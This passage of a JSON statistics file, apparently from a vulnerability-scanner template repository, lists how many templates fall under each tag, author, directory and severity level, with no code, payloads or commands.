","count":1},{"name":"lokalise","count":1},{"name":"poweredbygaysocial-mastodon-instance","count":1},{"name":"misp","count":1},{"name":"normhost","count":1},{"name":"tutorlms","count":1},{"name":"tika","count":1},{"name":"blogger","count":1},{"name":"buddypress","count":1},{"name":"asciinema","count":1},{"name":"hcm","count":1},{"name":"syncthing","count":1},{"name":"personal-dictionary","count":1},{"name":"pivotaltracker","count":1},{"name":"cybrotech","count":1},{"name":"planet","count":1},{"name":"zm","count":1},{"name":"rantli","count":1},{"name":"gunicorn","count":1},{"name":"macaddresslookup","count":1},{"name":"pieregister","count":1},{"name":"ulubpl","count":1},{"name":"ektron","count":1},{"name":"svnserve","count":1},{"name":"allmylinks","count":1},{"name":"moxfield","count":1},{"name":"pikabu","count":1},{"name":"oliver","count":1},{"name":"zentao","count":1},{"name":"razer","count":1},{"name":"teltonika","count":1},{"name":"zipkin","count":1},{"name":"sh","count":1},{"name":"ncomputing","count":1},{"name":"ulterius","count":1},{"name":"registrationmagic","count":1},{"name":"aquasec","count":1},{"name":"arcserve","count":1},{"name":"olt","count":1},{"name":"sterling","count":1},{"name":"secui","count":1},{"name":"macshell","count":1},{"name":"mailer","count":1},{"name":"etherscan","count":1},{"name":"dwr","count":1},{"name":"todoist","count":1},{"name":"streamlabs","count":1},{"name":"realteo","count":1},{"name":"smashrun","count":1},{"name":"ismygirl","count":1},{"name":"exagrid","count":1},{"name":"paneil","count":1},{"name":"karabin","count":1},{"name":"micollab","count":1},{"name":"jobs","count":1},{"name":"fortimanager","count":1},{"name":"mobile","count":1},{"name":"filetransfer","count":1},{"name":"flir-ax8","count":1},{"name":"erp-nc","count":1},{"name":"shoretel","count":1},{"name":"uberflip","count":1},{"name":"bibliopac","count":1},{"name":"biqsdrive","count":1},{"name":"syncthru","count":1},{"name":"codeberg","count":1},{"name":"imageshack","count":1},{"name":"networkdb","count":1},{"name":"ffserver","count":1},{"name":"sfd","count":1},{"name":"awx","count":1}],"authors":[{"name":"dhiyaneshdk","count":1056},{"name":"dwisiswant0","count":798},{"name":"daffainfo","count":787},{"name":"pikpikcu","count":353},{"name":"pussycat0x","count":289},{"name":"pdteam","count":283},{"name":"ritikchaddha","count":259},{"name":"ricardomaia","count":225},{"name":"geeknik","count":221},{"name":"theamanrawat","count":179},{"name":"0x_akoko","count":179},{"name":"princechaddha","count":161},{"name":"gy741","count":147},{"name":"arafatansari","count":119},{"name":"tess","count":109},{"name":"r3y3r53","count":80},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":63},{"name":"akincibor","count":58},{"name":"for3stco1d","count":55},{"name":"pdresearch","count":48},{"name":"righettod","count":46},{"name":"philippedelteil","count":42},{"name":"gaurang","count":42},{"name":"edoardottt","count":41},{"name":"iamnoooob","count":37},{"name":"c-sh0","count":35},{"name":"rootxharsh","count":34},{"name":"sleepingbag945","count":33},{"name":"adam crosser","count":31},{"name":"j4vaovo","count":31},{"name":"johnk3r","count":26},{"name":"ice3man","count":26},{"name":"pwnhxl","count":25},{"name":"hardik-solanki","count":24},{"name":"organiccrap","count":24},{"name":"techbrunchfr","count":23},{"name":"ffffffff0x","count":22},{"name":"harsh","count":22},{"name":"ctflearner","count":19},{"name":"sullo","count":18},{"name":"cckuailong","count":18},{"name":"parthmalhotra","count":17},{"name":"random-robbie","count":16},{"name":"lu4nx","count":16},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"r3dg33k","count":14},{"name":"milo2012","count":14},{"name":"tenbird","count":14},{"name":"nullfuzz","count":13},{"name":"0ri2n","count":13},{"name":"melbadry9","count":13},{"name":"theabhinavgaur","count":13},{"name":"sharath","count":13},{"name":"dogasantos","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"0xpugazh","count":11},{"name":"wdahlenb","count":11},{"name":"elsfa7110","count":11},{"name":"alph4byt3","count":10},{"name":"random_robbie","count":10},{"name":"logicalhunter","count":10},{"name":"co5mos","count":10},{"name":"hackergautam","count":10},{"name":"nadino","count":10},{"name":"meme-lord","count":10},{"name":"momika233","count":9},{"name":"emadshanab","count":9},{"name":"fabaff","count":9},{"name":"0x240x23elu","count":9},{"name":"olearycrew","count":9},{"name":"oppsec","count":9},{"name":"aashiq","count":8},{"name":"zh","count":8},{"name":"irshad ahamed","count":8},{"name":"_0xf4n9x_","count":8},{"name":"that_juan_","count":8},{"name":"mastercho","count":8},{"name":"iamthefrogy","count":8},{"name":"veshraj","count":8},{"name":"randomstr1ng","count":7},{"name":"leovalcante","count":7},{"name":"noraj","count":7},{"name":"caspergn","count":7},{"name":"amit-jd","count":7},{"name":"kophjager007","count":7},{"name":"divya_mudgal","count":7},{"name":"dr_set","count":7},{"name":"me_dheeraj (https://twitter.com/dheerajmadhukar)","count":7},{"name":"its0x08","count":7},{"name":"harshbothra_","count":7},{"name":"adamcrosser","count":7},{"name":"techryptic (@tech)","count":7},{"name":"evan rubinstein","count":6},{"name":"ja1sh","count":6},{"name":"forgedhallpass","count":6},{"name":"__fazal","count":6},{"name":"pathtaga","count":6},{"name":"nodauf","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"xelkomy","count":6},{"name":"pentest_swissky","count":6},{"name":"puzzlepeaches","count":6},{"name":"gitlab red team","count":6},{"name":"clem9669","count":6},{"name":"imnightmaree","count":6},{"name":"devang-solanki","count":6},{"name":"justaacat","count":6},{"name":"kh4sh3i","count":5},{"name":"mr-xn","count":5},{"name":"bhutch","count":5},{"name":"kazet","count":5},{"name":"shine","count":5},{"name":"r12w4n","count":5},{"name":"prajiteshsingh","count":5},{"name":"panch0r3d","count":5},{"name":"defr0ggy","count":5},{"name":"vicrack","count":5},{"name":"yanyun","count":5},{"name":"s0obi","count":5},{"name":"ganofins","count":5},{"name":"robotshell","count":5},{"name":"podalirius","count":5},{"name":"joanbono","count":5},{"name":"3th1c_yuk1","count":4},{"name":"tanq16","count":4},{"name":"h1ei1","count":4},{"name":"incogbyte","count":4},{"name":"scent2d","count":4},{"name":"dolev farhi","count":4},{"name":"r3naissance","count":4},{"name":"megamansec","count":4},{"name":"lum8rjack","count":4},{"name":"powerexploit","count":4},{"name":"ggranjus","count":4},{"name":"e_schultze_","count":4},{"name":"dadevel","count":4},{"name":"wisnupramoedya","count":4},{"name":"arm!tage","count":4},{"name":"bernardofsr","count":3},{"name":"canberbamber","count":3},{"name":"k0pak4","count":3},{"name":"matt galligan","count":3},{"name":"dr0pd34d","count":3},{"name":"me9187","count":3},{"name":"sushantkamble","count":3},{"name":"randomrobbie","count":3},{"name":"huta0","count":3},{"name":"hahwul","count":3},{"name":"vsh00t","count":3},{"name":"taielab","count":3},{"name":"cheesymoon","count":3},{"name":"0w4ys","count":3},{"name":"parth","count":3},{"name":"_generic_human_","count":3},{"name":"andydoering","count":3},{"name":"emenalf","count":3},{"name":"shifacyclewala","count":3},{"name":"alifathi-h1","count":3},{"name":"fxploit","count":3},{"name":"badboycxcc","count":3},{"name":"thomas_from_offensity","count":3},{"name":"impramodsargar","count":3},{"name":"atomiczsec","count":3},{"name":"arcc","count":3},{"name":"mavericknerd","count":3},{"name":"ambassify","count":3},{"name":"lark-lab","count":3},{"name":"dudez","count":3},{"name":"huowuzhao","count":3},{"name":"binaryfigments","count":3},{"name":"imjust0","count":3},{"name":"fyoorer","count":3},{"name":"vagnerd","count":3},{"name":"m4lwhere","count":3},{"name":"jarijaas","count":3},{"name":"johnjhacking","count":3},{"name":"ekrause","count":3},{"name":"lucasljm2001","count":3},{"name":"z3bd","count":3},{"name":"swissky","count":3},{"name":"f1tz","count":3},{"name":"nybble04","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"davidmckennirey","count":3},{"name":"splint3r7","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"ph33r","count":3},{"name":"skeltavik","count":3},{"name":"unstabl3","count":3},{"name":"whoever","count":3},{"name":"true13","count":3},{"name":"evergreencartoons","count":3},{"name":"moritz nentwig","count":2},{"name":"thezakman","count":2},{"name":"nkxxkn","count":2},{"name":"notnotnotveg","count":2},{"name":"github.com/its0x08","count":2},{"name":"cckuakilong","count":2},{"name":"z0ne","count":2},{"name":"sinkettu","count":2},{"name":"dogancanbakir","count":2},{"name":"kishore-hariram","count":2},{"name":"ree4pwn","count":2},{"name":"cocxanh","count":2},{"name":"j3ssie","count":2},{"name":"udit_thakkur","count":2},{"name":"amsda","count":2},{"name":"n-thumann","count":2},{"name":"martincodes-de","count":2},{"name":"x1m_martijn","count":2},{"name":"hackerarpan","count":2},{"name":"myztique","count":2},{"name":"w4cky_","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"bp0lr","count":2},{"name":"e1a","count":2},{"name":"vavkamil","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"bing0o","count":2},{"name":"bananabr","count":2},{"name":"nvn1729","count":2},{"name":"danielmofer","count":2},{"name":"joshua rogers","count":2},{"name":"8arthur","count":2},{"name":"gal nagli","count":2},{"name":"g4l1t0","count":2},{"name":"thardt-praetorian","count":2},{"name":"smaranchand","count":2},{"name":"korteke","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"d4vy","count":2},{"name":"sbani","count":2},{"name":"wa1tf0rme","count":2},{"name":"0xrudra","count":2},{"name":"raesene","count":2},{"name":"ayadim","count":2},{"name":"0xsmiley","count":2},{"name":"ep1csage","count":2},{"name":"shelled","count":2},{"name":"y4er","count":2},{"name":"ehsahil","count":2},{"name":"joeldeleep","count":2},{"name":"666asd","count":2},{"name":"foulenzer","count":2},{"name":"sascha brendel","count":2},{"name":"streetofhackerr007","count":2},{"name":"brenocss","count":2},{"name":"mohammedsaneem","count":2},{"name":"convisoappsec","count":2},{"name":"redteambrasil","count":2},{"name":"k11h-de","count":2},{"name":"randomdhiraj","count":2},{"name":"brucelsone","count":2},{"name":"hetroublemakr","count":2},{"name":"socketz","count":2},{"name":"coldfish","count":2},{"name":"nuk3s3c","count":2},{"name":"sy3omda","count":2},{"name":"afaq","count":2},{"name":"pxmme1337","count":2},{"name":"gevakun","count":2},{"name":"codexlynx","count":2},{"name":"dahse89","count":2},{"name":"gtrrnr","count":2},{"name":"c3l3si4n","count":2},{"name":"geekby","count":2},{"name":"maximus decimus","count":2},{"name":"paradessia","count":2},{"name":"rafaelwdornelas","count":2},{"name":"kre80r","count":2},{"name":"dbrwsky","count":2},{"name":"0xnirvana","count":2},{"name":"uomogrande","count":2},{"name":"manas_harsh","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"koti2","count":2},{"name":"luci","count":2},{"name":"bsysop","count":2},{"name":"heeress","count":2},{"name":"ajaysenr","count":2},{"name":"kiblyn11","count":2},{"name":"joshlarsen","count":2},{"name":"lotusdll","count":2},{"name":"v0idc0de","count":2},{"name":"0xelkomy","count":2},{"name":"0xprial","count":2},{"name":"0xsapra","count":2},{"name":"paperpen","count":2},{"name":"clarkvoss","count":2},{"name":"dheerajmadhukar","count":2},{"name":"zomsop82","count":2},{"name":"0xcrypto","count":2},{"name":"supras","count":2},{"name":"affix","count":1},{"name":"co0nan","count":1},{"name":"francescocarlucci","count":1},{"name":"arliya","count":1},{"name":"lamscun","count":1},{"name":"absshax","count":1},{"name":"tim_koopmans","count":1},{"name":"unp4ck","count":1},{"name":"shiva (strobes security)","count":1},{"name":"jc175","count":1},{"name":"danigoland","count":1},{"name":"wabafet","count":1},{"name":"yuansec","count":1},{"name":"bad5ect0r","count":1},{"name":"lixts","count":1},{"name":"vzamanillo","count":1},{"name":"nielsing","count":1},{"name":"kagamigawa","count":1},{"name":"viniciuspereiras","count":1},{"name":"0h1in9e","count":1},{"name":"xianke","count":1},{"name":"mr. bobo hp","count":1},{"name":"erethon","count":1},{"name":"pphuahua","count":1},{"name":"cookiehanhoan","count":1},{"name":"shifacyclewla","count":1},{"name":"ok_bye_now","count":1},{"name":"infosecsanyam","count":1},{"name":"mukundbhuva","count":1},{"name":"noah @thesubtlety","count":1},{"name":"patralos","count":1},{"name":"sickwell","count":1},{"name":"ofjaaah","count":1},{"name":"tirtha_mandal","count":1},{"name":"ooooooo_q","count":1},{"name":"ling","count":1},{"name":"osamahamad","count":1},{"name":"justmumu","count":1},{"name":"knassar702","count":1},{"name":"bugvsme","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"undefl0w","count":1},{"name":"esonhugh","count":1},{"name":"ptonewreckin","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"open-sec","count":1},{"name":"manasmbellani","count":1},{"name":"lady_bug","count":1},{"name":"arall","count":1},{"name":"metascan","count":1},{"name":"5up3r541y4n","count":1},{"name":"shivampand3y","count":1},{"name":"pudsec","count":1},{"name":"0xteles","count":1},{"name":"b4uh0lz","count":1},{"name":"rotembar","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"kaizensecurity","count":1},{"name":"jub0bs","count":1},{"name":"flag007","count":1},{"name":"skylark-lab","count":1},{"name":"1nf1n7y","count":1},{"name":"hczdmr","count":1},{"name":"jaimin gondaliya","count":1},{"name":"dk999","count":1},{"name":"th3.d1p4k","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"petergrifin","count":1},{"name":"mayankpandey01","count":1},{"name":"kresec","count":1},{"name":"screamy","count":1},{"name":"gpiechnik2","count":1},{"name":"husain","count":1},{"name":"carlosvieira","count":1},{"name":"nerrorsec","count":1},{"name":"davidfegyver","count":1},{"name":"dhiyaneshdki","count":1},{"name":"ilovebinbash","count":1},{"name":"kabirsuda","count":1},{"name":"mhdsamx","count":1},{"name":"philippdelteil","count":1},{"name":"becivells","count":1},{"name":"jiheon-dev","count":1},{"name":"notsoevilweasel","count":1},{"name":"noamrathaus","count":1},{"name":"aringo","count":1},{"name":"numan türle","count":1},{"name":"dawid-czarnecki","count":1},{"name":"dmartyn","count":1},{"name":"ynnirc","count":1},{"name":"ndmalc","count":1},{"name":"noobexploiter","count":1},{"name":"sak1","count":1},{"name":"regala_","count":1},{"name":"anon-artist","count":1},{"name":"charanrayudu","count":1},{"name":"brabbit10","count":1},{"name":"exceed","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"furkansenan","count":1},{"name":"palanichamy_perumal","count":1},{"name":"rotemreiss","count":1},{"name":"alevsk","count":1},{"name":"bjhulst","count":1},{"name":"ahmed abou-ela","count":1},{"name":"houdinis","count":1},{"name":"pulsesecurity.co.nz","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"berkdusunur","count":1},{"name":"xstp","count":1},{"name":"p-l-","count":1},{"name":"alperenkesk","count":1},{"name":"dievus","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"0xd0ff9","count":1},{"name":"thelicato","count":1},{"name":"dorkerdevil","count":1},{"name":"mah3sec_","count":1},{"name":"f1she3","count":1},{"name":"djoevanka","count":1},{"name":"keni0k","count":1},{"name":"ph33rr","count":1},{"name":"manuelbua","count":1},{"name":"couskito","count":1},{"name":"pascalheidmann","count":1},{"name":"pbuff07","count":1},{"name":"igibanez","count":1},{"name":"opencirt","count":1},{"name":"willd96","count":1},{"name":"zy9ard3","count":1},{"name":"8authur","count":1},{"name":"rschio","count":1},{"name":"guax1","count":1},{"name":"yashanand155","count":1},{"name":"makyotox","count":1},{"name":"millermedia","count":1},{"name":"izn0u","count":1},{"name":"revblock","count":1},{"name":"zinminphy0","count":1},{"name":"failopen","count":1},{"name":"luqmaan hadia","count":1},{"name":"juliosmelo","count":1},{"name":"th3r4id","count":1},{"name":"kiks7","count":1},{"name":"thirukrishnan","count":1},{"name":"b0yd","count":1},{"name":"kurohost","count":1},{"name":"w0tx","count":1},{"name":"fopina","count":1},{"name":"arr0way","count":1},{"name":"schniggie","count":1},{"name":"nobody","count":1},{"name":"jbertman","count":1},{"name":"hakimkt","count":1},{"name":"alex","count":1},{"name":"luisfelipe146","count":1},{"name":"zandros0","count":1},{"name":"xeldax","count":1},{"name":"piyushchhiroliya","count":1},{"name":"phyr3wall","count":1},{"name":"liquidsec","count":1},{"name":"droberson","count":1},{"name":"topscoder","count":1},{"name":"thebinitghimire","count":1},{"name":"jeya seelan","count":1},{"name":"tarunkoyalwar","count":1},{"name":"imhunterand","count":1},{"name":"blckraven","count":1},{"name":"thevillagehacker","count":1},{"name":"qlkwej","count":1},{"name":"matt miller","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"kchason","count":1},{"name":"daffianfo","count":1},{"name":"fq_hsu","count":1},{"name":"michael wedl","count":1},{"name":"prettyboyaaditya","count":1},{"name":"secthebit","count":1},{"name":"rodnt","count":1},{"name":"ramondunker","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"xshuden","count":1},{"name":"y0no","count":1},{"name":"hazana","count":1},{"name":"kailashbohara","count":1},{"name":"sicksec","count":1},{"name":"whynotke","count":1},{"name":"ldionmarcil","count":1},{"name":"pdp","count":1},{"name":"_c0wb0y_","count":1},{"name":"barthy.koeln","count":1},{"name":"elitebaz","count":1},{"name":"fmunozs","count":1},{"name":"x6263","count":1},{"name":"d0rkerdevil","count":1},{"name":"nagli","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"xcapri","count":1},{"name":"ola456","count":1},{"name":"brianlam38","count":1},{"name":"_harleo","count":1},{"name":"akash.c","count":1},{"name":"hakluke","count":1},{"name":"arqsz","count":1},{"name":"chron0x","count":1},{"name":"httpvoid","count":1},{"name":"therealtoastycat","count":1},{"name":"mass0ma","count":1},{"name":"_darrenmartyn","count":1},{"name":"momen eldawakhly","count":1},{"name":"aaban solutions","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"aayush vishnoi","count":1},{"name":"majidmc2","count":1},{"name":"miryangjung","count":1},{"name":"spac3wh1te","count":1},{"name":"mbmy","count":1},{"name":"elder tao","count":1},{"name":"jna1","count":1},{"name":"deena","count":1},{"name":"king-alexander","count":1},{"name":"soyelmago","count":1},{"name":"0ut0fb4nd","count":1},{"name":"compr00t","count":1},{"name":"lark lab","count":1},{"name":"orpheus","count":1},{"name":"ruppde","count":1},{"name":"remonsec","count":1},{"name":"omarjezi","count":1},{"name":"jonathanwalker","count":1},{"name":"mantissts","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"arjunchandarana","count":1},{"name":"stupidfish","count":1},{"name":"akokonunes","count":1},{"name":"mabdullah22","count":1},{"name":"zeyad azima","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"ohlinge","count":1},{"name":"aresx","count":1},{"name":"andirrahmani1","count":1},{"name":"act1on3","count":1},{"name":"oscarintherocks","count":1},{"name":"ramkrishna sawant","count":1},{"name":"lethargynavigator","count":1},{"name":"kareemse1im","count":1},{"name":"2rs3c","count":1},{"name":"jas37","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"juicypotato1","count":1},{"name":"af001","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"myst7ic","count":1},{"name":"0xrod","count":1},{"name":"dabla","count":1},{"name":"apt-mirror","count":1},{"name":"pry0cc","count":1},{"name":"rojanrijal","count":1},{"name":"hateshape","count":1},{"name":"jrolf","count":1},{"name":"0xceeb","count":1},{"name":"evolutionsec","count":1},{"name":"iphantasmic","count":1},{"name":"colbyjack1134","count":1},{"name":"irshadahamed","count":1},{"name":"shiar","count":1},{"name":"bywalks","count":1},{"name":"mesaglio","count":1},{"name":"evan rubinstien","count":1},{"name":"naglis","count":1},{"name":"borna nematzadeh","count":1},{"name":"adrianmf","count":1},{"name":"shreyapohekar","count":1},{"name":"jaskaran","count":1},{"name":"adnanekhan","count":1},{"name":"tirtha","count":1},{"name":"booboohq","count":1},{"name":"exploitation","count":1},{"name":"dali","count":1},{"name":"official_blackhat13","count":1},{"name":"professorabhay","count":1},{"name":"petruknisme","count":1},{"name":"gboddin","count":1},{"name":"hardik-rathod","count":1},{"name":"c4sper0","count":1},{"name":"tehtbl","count":1},{"name":"mrcl0wnlab","count":1},{"name":"lucky0x0d","count":1},{"name":"elmahdi","count":1},{"name":"harshinsecurity","count":1},{"name":"paper-pen","count":1},{"name":"s1r1u5_","count":1},{"name":"sherlocksecurity","count":1},{"name":"0xh7ml","count":1},{"name":"amanrawat","count":1},{"name":"kr1shna4garwal","count":1},{"name":"pratik khalane","count":1},{"name":"rubina119","count":1},{"name":"sec_hawk","count":1},{"name":"r3nz0","count":1},{"name":"miroslavsotak","count":1},{"name":"natto97","count":1},{"name":"zhenwarx","count":1},{"name":"vinit989","count":1},{"name":"carrot2","count":1},{"name":"intx0x80","count":1},{"name":"qianbenhyu","count":1},{"name":"yashgoti","count":1},{"name":"sshell","count":1},{"name":"jbaines-r7","count":1},{"name":"freakyclown","count":1},{"name":"amnotacat","count":1},{"name":"ipanda","count":1},{"name":"micha3lb3n","count":1},{"name":"iampritam","count":1},{"name":"daviey","count":1},{"name":"aron molnar","count":1},{"name":"hanlaomo","count":1},{"name":"j33n1k4","count":1},{"name":"nytr0gen","count":1},{"name":"push4d","count":1},{"name":"hexcat","count":1},{"name":"mrharshvardhan","count":1},{"name":"unkl4b","count":1},{"name":"marcos_iaf","count":1},{"name":"vikas kundu","count":1},{"name":"pussycat0","count":1},{"name":"wlayzz","count":1},{"name":"farish","count":1},{"name":"b0rn2r00t","count":1},{"name":"dale clarke","count":1},{"name":"shockwave","count":1},{"name":"mariam tariq","count":1},{"name":"aringo-bf","count":1},{"name":"narluin","count":1},{"name":"jeya.seelan","count":1},{"name":"mihhailsokolov","count":1},{"name":"supr4s","count":1},{"name":"marcio mendes","count":1},{"name":"jcockhren","count":1},{"name":"galoget","count":1},{"name":"ransomsec","count":1},{"name":"shelld3v","count":1},{"name":"omarkurt","count":1},{"name":"patrick pirker","count":1},{"name":"jteles","count":1},{"name":"ayadi","count":1},{"name":"parzival","count":1},{"name":"pjborah","count":1},{"name":"allenwest24","count":1},{"name":"h4kux","count":1},{"name":"luskabol","count":1},{"name":"0xceba","count":1},{"name":"alexrydzak","count":1},{"name":"yavolo","count":1},{"name":"higor melgaço","count":1},{"name":"aaronchen0","count":1},{"name":"ringo","count":1},{"name":"bartu utku sarp","count":1},{"name":"caon","count":1},{"name":"ahmetpergamum","count":1},{"name":"lingtren","count":1},{"name":"0xtavian","count":1},{"name":"elouhi","count":1},{"name":"andreluna","count":1},{"name":"chesterblue","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"breno_css","count":1},{"name":"aravind","count":1},{"name":"pepitoh","count":1},{"name":"retr02332","count":1},{"name":"udinchan","count":1},{"name":"udyz","count":1},{"name":"exid","count":1},{"name":"viondexd","count":1},{"name":"mubassirpatel","count":1},{"name":"zsusac","count":1},{"name":"none","count":1},{"name":"luqman","count":1},{"name":"kiransau","count":1},{"name":"am0nt31r0","count":1},{"name":"queencitycyber","count":1},{"name":"ahmed sherif","count":1},{"name":"toufik-airane","count":1},{"name":"bughuntersurya","count":1},{"name":"dwbzn","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"lrtk-coder","count":1},{"name":"calumjelrick","count":1},{"name":"realexp3rt","count":1},{"name":"akshansh","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"tea","count":1},{"name":"mzack9999","count":1},{"name":"rivalsec","count":1},{"name":"geraldino2","count":1},{"name":"retr0","count":1},{"name":"un-fmunozs","count":1},{"name":"nuts7","count":1},{"name":"furkansayim","count":1},{"name":"duty_1g","count":1},{"name":"sinsinology","count":1},{"name":"andysvints","count":1},{"name":"florianmaak","count":1},{"name":"clment cruchet","count":1}],"directory":[{"name":"http","count":6342},{"name":"file","count":309},{"name":"workflows","count":191},{"name":"network","count":116},{"name":"ssl","count":26},{"name":"dns","count":17},{"name":"headless","count":9},{"name":"TEMPLATES-STATS.json","count":1},{"name":"contributors.json","count":1},{"name":"cves.json","count":1}],"severity":[{"name":"info","count":3217},{"name":"high","count":1288},{"name":"medium","count":1270},{"name":"critical","count":785},{"name":"low","count":230},{"name":"unknown","count":29}],"types":[{"name":"file","count":309},{"name":"dns","count":17}]}
+{"tags":[{"name":"cve","count":2065},{"name":"panel","count":988},{"name":"wordpress","count":832},{"name":"exposure","count":791},{"name":"xss","count":730},{"name":"wp-plugin","count":721},{"name":"osint","count":675},{"name":"tech","count":632},{"name":"lfi","count":601},{"name":"edb","count":598},{"name":"misconfig","count":513},{"name":"rce","count":489},{"name":"packetstorm","count":446},{"name":"cve2021","count":443},{"name":"cve2022","count":431},{"name":"wpscan","count":382},{"name":"wp","count":330},{"name":"file","count":318},{"name":"unauth","count":300},{"name":"authenticated","count":254},{"name":"sqli","count":253},{"name":"cve2020","count":248},{"name":"token-spray","count":241},{"name":"kev","count":218},{"name":"top-200","count":212},{"name":"osint-social","count":210},{"name":"config","count":201},{"name":"","count":195},{"name":"token","count":193},{"name":"oast","count":187},{"name":"intrusive","count":186},{"name":"cve2023","count":183},{"name":"default-login","count":171},{"name":"login","count":164},{"name":"iot","count":159},{"name":"cve2018","count":157},{"name":"apache","count":157},{"name":"cve2019","count":156},{"name":"joomla","count":137},{"name":"malware","count":131},{"name":"detect","count":118},{"name":"redirect","count":118},{"name":"cve2010","count":112},{"name":"network","count":105},{"name":"files","count":104},{"name":"auth-bypass","count":104},{"name":"router","count":101},{"name":"ssrf","count":101},{"name":"top-100","count":100},{"name":"cms","count":98},{"name":"cve2017","count":80},{"name":"disclosure","count":79},{"name":"devops","count":77},{"name":"takeover","count":75},{"name":"install","count":72},{"name":"seclists","count":70},{"name":"fileupload","count":69},{"name":"oracle","count":66},{"name":"oss","count":63},{"name":"cisco","count":56},{"name":"adobe","count":55},{"name":"cve2015","count":55},{"name":"cve2016","count":54},{"name":"google","count":53},{"name":"tokens","count":52},{"name":"atlassian","count":48},{"name":"logs","count":46},{"name":"tenable","count":46},{"name":"vmware","count":45},{"name":"osint-gaming","count":45},{"name":"huntr","count":45},{"name":"debug","count":44},{"name":"aem","count":44},{"name":"vulhub","count":44},{"name":"c2","count":43},{"name":"hackerone","count":43},{"name":"osint-porn","count":42},{"name":"osint-hobby","count":42},{"name":"cve2014","count":42},{"name":"plugin","count":42},{"name":"generic","count":41},{"name":"springboot","count":39},{"name":"traversal","count":38},{"name":"oa","count":38},{"name":"jira","count":36},{"name":"cnvd","count":36},{"name":"misc","count":35},{"name":"aws","count":35},{"name":"kubernetes","count":35},{"name":"deserialization","count":35},{"name":"listing","count":35},{"name":"osint-misc","count":35},{"name":"injection","count":35},{"name":"ir","count":33},{"name":"osint-tech","count":31},{"name":"log4j","count":30},{"name":"php","count":30},{"name":"osint-coding","count":30},{"name":"sap","count":29},{"name":"gitlab","count":28},{"name":"fuzz","count":28},{"name":"api","count":27},{"name":"jndi","count":27},{"name":"cve2012","count":26},{"name":"microsoft","count":26},{"name":"k8s","count":26},{"name":"proxy","count":25},{"name":"firewall","count":25},{"name":"wp-theme","count":24},{"name":"osint-business","count":24},{"name":"osint-shopping","count":24},{"name":"osint-images","count":24},{"name":"osint-finance","count":24},{"name":"weaver","count":24},{"name":"manageengine","count":24},{"name":"zoho","count":23},{"name":"stored-xss","count":23},{"name":"amazon","count":23},{"name":"cloud","count":22},{"name":"dlink","count":22},{"name":"keys","count":22},{"name":"tomcat","count":22},{"name":"ecology","count":21},{"name":"weblogic","count":21},{"name":"ibm","count":21},{"name":"lfr","count":21},{"name":"msf","count":21},{"name":"yonyou","count":20},{"name":"xxe","count":20},{"name":"camera","count":20},{"name":"cicd","count":20},{"name":"admin","count":20},{"name":"ssl","count":20},{"name":"github","count":20},{"name":"fortinet","count":20},{"name":"rukovoditel","count":19},{"name":"struts","count":19},{"name":"dns","count":19},{"name":"jenkins","count":19},{"name":"ftp","count":18},{"name":"osint-music","count":18},{"name":"grafana","count":18},{"name":"service","count":18},{"name":"printer","count":18},{"name":"wavlink","count":18},{"name":"cve2011","count":17},{"name":"nginx","count":17},{"name":"cve2009","count":16},{"name":"osint-blog","count":16},{"name":"backup","count":16},{"name":"citrix","count":16},{"name":"java","count":15},{"name":"cnvd2021","count":15},{"name":"jarm","count":15},{"name":"cve2008","count":15},{"name":"zyxel","count":15},{"name":"seeyon","count":15},{"name":"magento","count":15},{"name":"tongda","count":15},{"name":"hp","count":15},{"name":"status","count":15},{"name":"android","count":15},{"name":"coldfusion","count":14},{"name":"osint-health","count":14},{"name":"cve2013","count":14},{"name":"osint-art","count":14},{"name":"jboss","count":14},{"name":"confluence","count":14},{"name":"enum","count":14},{"name":"domainmod","count":14},{"name":"nodejs","count":14},{"name":"ruijie","count":14},{"name":"npm","count":14},{"name":"woocommerce","count":14},{"name":"mail","count":14},{"name":"audit","count":14},{"name":"login-check","count":13},{"name":"vpn","count":13},{"name":"bypass","count":13},{"name":"airflow","count":13},{"name":"cuppa","count":13},{"name":"abstractapi","count":13},{"name":"azure","count":13},{"name":"creds-stuffing","count":13},{"name":"fortigate","count":13},{"name":"laravel","count":13},{"name":"osint-political","count":13},{"name":"osint-dating","count":13},{"name":"alibaba","count":12},{"name":"netgear","count":12},{"name":"git","count":12},{"name":"sonicwall","count":12},{"name":"dashboard","count":12},{"name":"microweber","count":12},{"name":"ruby","count":12},{"name":"kafka","count":12},{"name":"netsweeper","count":12},{"name":"dell","count":12},{"name":"drupal","count":12},{"name":"backdoor","count":12},{"name":"webserver","count":12},{"name":"auth","count":12},{"name":"rails","count":12},{"name":"zimbra","count":12},{"name":"graphql","count":12},{"name":"setup","count":11},{"name":"file-upload","count":11},{"name":"online-fire-reporting","count":11},{"name":"fastjson","count":11},{"name":"osint-video","count":11},{"name":"docker","count":11},{"name":"spring","count":11},{"name":"jolokia","count":11},{"name":"phpmyadmin","count":11},{"name":"prestashop","count":1